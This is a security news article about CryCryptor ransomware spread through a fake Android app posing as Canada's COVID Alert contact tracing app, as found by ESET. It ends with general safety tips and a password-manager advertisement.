Hackers are impersonating the Canadian’s government COVID-19 contact tracing app to spread ransomware threat. However, the tracking app is yet to be released for people.
Amid the coronavirus pandemic situation, where people and the government are trying to cope with it. Hence, the contact tracing app has an important role to play. As these apps help to track the people, who may have come in contact with an infectious person.
Similarly, the Canadain government has also recently announced the contact tracing app named “COVID Alert”. The app will be released for the people after a month.
Hackers Target Contact Tracing app Spread Ransomware
However, the attackers are taking advantage of the tracing apps to spread malware and other threats. In recent, the hackers delivered fake Apps concealed with Malware that mimics TraceTogether- a singapore contact tracing app. Now, the attackers are again running a campaign that releases a fake Android app. The app claims to be from “Health Canada,” however it delivers malware that eventually infects the device with ransomware threat.
The researchers at ESET discovered the attack, in which the hackers used two malicious domains named as tracershield[.]ca and covid19tracer[.]ca. These domains offer users to download the APK file of the app, however they are not active now.
The CryCryptor Ransomware
If any user installs the APK file, it installs a ransomware threat named as “CryCryptor”. After which, the threat asks the permission to access the files stored on the device. Once gaining the permission, the program starts to encrypt the files of various extensions.
It uses the AES encryption algorithm to encrypt the data and lock the files with a random 16 characters key. Additionally, the original file is replaced with the “.enc” extension and along with that 3 more files are created.
The researchers also added that
“the algorithm generates a salt unique for every encrypted file, stored with the extension ‘.enc.salt’; and an initialization vector, ‘.enc.iv’ ”.
After completion of the process, the ransomware alerts users with “good news” messages, via a file “Personal files encrypted, see readme_now.txt”. The ransom note shows the instructions on how to recover the files back.
What Researchers Found
The source code of the aforementioned ransomware threat is available on Github named as “CryDroid,” the people or author behind this claims it to be a part of project research. However, this may not be the true fact.
According the ESET blog post, concluded about it saying that,
We dismiss the claim that the project has research purposes – no responsible researcher would publicly release a tool that is easy to misuse for malicious purposes.
Fortunately, the ESET team has created a decryption tool for the ransomware to help the infected users to recover their files.
To stay safe, the Canadian government will take necessary steps in educating the users about the correct usage and status of the app. So as they don’t fall for any such scams.
- Users should always avoid downloading apps from unknown sources. And always opt for official App stores to download the apps.
- Enable Google Play Protect that scans the apps before downloading.
- Enable two-factor authentication for the apps to secure them.
- Keep strong password and use password managers to secure them in encrypted form.
- Also install a reputable anti-virus program to keep threats away.
Although, it is very important to enable 2FA on your accounts, and use strong passwords. But to keep the passwords secure you should use a reputable Password Manager tool like Dashlane(Review).
To secure Your Digital Wallets download DashLane Password Manager Now.